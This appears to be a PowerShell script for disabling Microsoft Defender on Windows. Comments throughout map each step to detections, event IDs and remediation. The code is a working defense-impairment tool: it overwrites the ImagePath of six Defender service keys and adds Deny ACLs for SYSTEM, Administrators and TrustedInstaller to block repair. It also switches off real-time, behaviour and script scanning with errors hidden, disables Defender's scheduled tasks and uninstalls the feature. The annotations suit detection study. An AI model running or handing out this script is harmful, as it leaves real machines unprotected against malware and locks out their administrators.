disable windows defender.ps1
# Tampers with the service key of the Microsoft Defender Antivirus service (WinDefend):
# overwrites the key's ImagePath value, then adds Deny/FullControl entries to the key's ACL.
# Defender view: this is defense impairment (MITRE ATT&CK T1562.001). Writes under
# ...\Services\WinDefend from a PowerShell host are worth alerting on: Sysmon Event ID 13
# (registry value set), or Security Event IDs 4657 / 4670 where registry auditing is enabled.
# Defender Tamper Protection is designed to block changes of this kind.
$registryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"
# The bare word `null` in argument position is a string, not $null, so the value written is
# the literal text "null". An ImagePath of "null" on this key is a distinctive artefact to hunt for.
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
# $key is assigned here but not read anywhere in the visible script.
$key = Get-Item -Path $registryPath
# Principals that each receive a Deny rule below; the list includes SYSTEM, Administrators
# and TrustedInstaller, i.e. the accounts normally used to repair the key.
$users = @("TrustedInstaller", "ALL APPLICATION PACKAGES", "CREATOR OWNER", "SYSTEM", "Administrators", "Users")
foreach ($user in $users) {
# The ACL is re-read, extended by one Deny/FullControl rule and written back on every pass.
$acl = Get-Acl -Path $registryPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule($user, "FullControl", "Deny")
$acl.AddAccessRule($rule)
# Remediation note: restoring the key means resetting its DACL and putting back the
# ImagePath from a known-good baseline; verify the actual ACL on an affected host.
Set-Acl -Path $registryPath -AclObject $acl
}
# Repeats one pattern for five more Defender-related service keys: set ImagePath to the
# literal string "null" (bare `null` is a string in argument position), then add a
# Deny/FullControl ACL rule for each principal in $users. $key is assigned in every section
# but never read in the visible script.
# Keys touched, in order: Sense (Defender for Endpoint sensor service), WdFilter (Defender
# file-system minifilter driver), WdNisDrv (network inspection driver), WdNisSvc (network
# inspection service), WdBoot (early-launch antimalware driver).
# Defender view: treat any write to ImagePath or to the DACL of these keys as tampering
# (MITRE ATT&CK T1562.001). Sysmon Event ID 13 and, with registry auditing enabled, Security
# Event IDs 4657 / 4670 cover the writes. PowerShell script block logging (Event ID 4104)
# records the script text itself.

# --- Sense ---
$registryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
$key = Get-Item -Path $registryPath
$users = @("TrustedInstaller", "ALL APPLICATION PACKAGES", "CREATOR OWNER", "SYSTEM", "Administrators", "Users")
foreach ($user in $users) {
$acl = Get-Acl -Path $registryPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule($user, "FullControl", "Deny")
$acl.AddAccessRule($rule)
Set-Acl -Path $registryPath -AclObject $acl
}
# --- WdFilter ---
$registryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\WdFilter"
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
$key = Get-Item -Path $registryPath
$users = @("TrustedInstaller", "ALL APPLICATION PACKAGES", "CREATOR OWNER", "SYSTEM", "Administrators", "Users")
foreach ($user in $users) {
$acl = Get-Acl -Path $registryPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule($user, "FullControl", "Deny")
$acl.AddAccessRule($rule)
Set-Acl -Path $registryPath -AclObject $acl
}
# --- WdNisDrv ---
$registryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisDrv"
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
$key = Get-Item -Path $registryPath
$users = @("TrustedInstaller", "ALL APPLICATION PACKAGES", "CREATOR OWNER", "SYSTEM", "Administrators", "Users")
foreach ($user in $users) {
$acl = Get-Acl -Path $registryPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule($user, "FullControl", "Deny")
$acl.AddAccessRule($rule)
Set-Acl -Path $registryPath -AclObject $acl
}
# --- WdNisSvc ---
$registryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
$key = Get-Item -Path $registryPath
$users = @("TrustedInstaller", "ALL APPLICATION PACKAGES", "CREATOR OWNER", "SYSTEM", "Administrators", "Users")
foreach ($user in $users) {
$acl = Get-Acl -Path $registryPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule($user, "FullControl", "Deny")
$acl.AddAccessRule($rule)
Set-Acl -Path $registryPath -AclObject $acl
}
# --- WdBoot ---
$registryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\WdBoot"
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
$key = Get-Item -Path $registryPath
$users = @("TrustedInstaller", "ALL APPLICATION PACKAGES", "CREATOR OWNER", "SYSTEM", "Administrators", "Users")
foreach ($user in $users) {
$acl = Get-Acl -Path $registryPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule($user, "FullControl", "Deny")
$acl.AddAccessRule($rule)
Set-Acl -Path $registryPath -AclObject $acl
}
# Turns off individual Microsoft Defender Antivirus protections one switch per call.
# -ErrorAction SilentlyContinue hides any failure, so the absence of errors in a transcript
# says nothing about which of these settings actually changed.
# Defender view: each successful change is recorded in the
# "Microsoft-Windows-Windows Defender/Operational" log (Event ID 5007, configuration changed;
# Event ID 5001, real-time protection disabled). A burst of Set-MpPreference -Disable* calls
# from one process is a high-signal T1562.001 pattern. Tamper Protection is designed to
# block these changes; confirm it is enforced centrally rather than per host.
Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue
# Same real-time-monitoring switch again, this time without error suppression.
Set-MpPreference -DisableRealtimeMonitoring $true
# Writes the policy value DisableAntiSpyware=1 (DWORD); -Force overwrites an existing value.
# NOTE(review): Microsoft documents this legacy value as ignored on current client builds;
# its presence under ...\Policies\Microsoft\Windows Defender is still a strong tamper
# indicator and should be part of registry baselining.
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
# Disables the four built-in Defender maintenance/scan scheduled tasks by name.
# Defender view: Security Event ID 4701 (a scheduled task was disabled) is logged when
# object-access auditing covers Task Scheduler. These four task names being disabled
# together is worth a dedicated detection.
Get-ScheduledTask "Windows Defender Cache Maintenance" | Disable-ScheduledTask
Get-ScheduledTask "Windows Defender Cleanup" | Disable-ScheduledTask
Get-ScheduledTask "Windows Defender Scheduled Scan" | Disable-ScheduledTask
Get-ScheduledTask "Windows Defender Verification" | Disable-ScheduledTask
# One call listing many -Disable* switches, largely overlapping the per-switch calls that
# precede these lines in the script.
# NOTE(review): reproduced exactly as on the page, including the space inside each `$ true`.
# Whether PowerShell binds this line as written is not verified here.
Set-MpPreference -DisableRealtimeMonitoring $ true -DisableAutoExclusions $ true -DisablePrivacyMode $ true -DisableBehaviorMonitoring $ true -DisableIntrusionPreventionSystem $ true -DisableIOAVProtection $ true -DisableScriptScanning $ true -DisableArchiveScanning $ true -DisableCatchupFullScan $ true -DisableCatchupQuickScan $ true -DisableEmailScanning $ true -DisableRemovableDriveScanning $ true -DisableRestorePoint $ true -DisableScannedMappedNetworkDrivesForFullScan $ true -DisableScanningNetworkFiles $ true -DisableBlockAtFirstSeen $ true
# Sets MAPS (cloud-delivered protection) reporting to 0, i.e. disabled.
Set-MpPreference -MAPSReporting 0
# Uninstall-WindowsFeature is a ServerManager cmdlet, so this line only applies on Windows
# Server; feature removal there shows up in servicing logs and usually needs a restart.
Uninstall-WindowsFeature -Name Windows-Defender
# Repeats the real-time-monitoring switch a final time.
Set-MpPreference -DisableRealtimeMonitoring $true